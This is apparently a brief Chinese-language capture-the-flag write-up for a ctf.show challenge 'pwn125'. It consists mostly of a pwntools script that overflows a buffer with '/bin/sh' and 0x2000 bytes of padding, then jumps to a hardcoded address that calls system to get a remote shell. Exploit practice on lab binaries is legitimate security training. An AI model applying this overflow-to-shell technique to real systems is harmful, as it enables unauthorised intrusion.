pwn125(scanf也可以调用system)

发表于 更新于 分类于

  1. 关键词眼:mov rsi, rax;说明scanf也可以调用system

  2. exp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    from pwn import *
    context(arch='amd64',os='linux',log_level='debug')
    elf = ELF('./pwn125')
    #r = process('./pwn125')
    r = remote("pwn.challenge.ctf.show",xxxxx)

    call_system = 0x400672
    #0x2000为偏移量
    payload = b'/bin/sh\x00' + cyclic(0x2000) + p64(call_system)

    r.sendline(payload)
    r.interactive()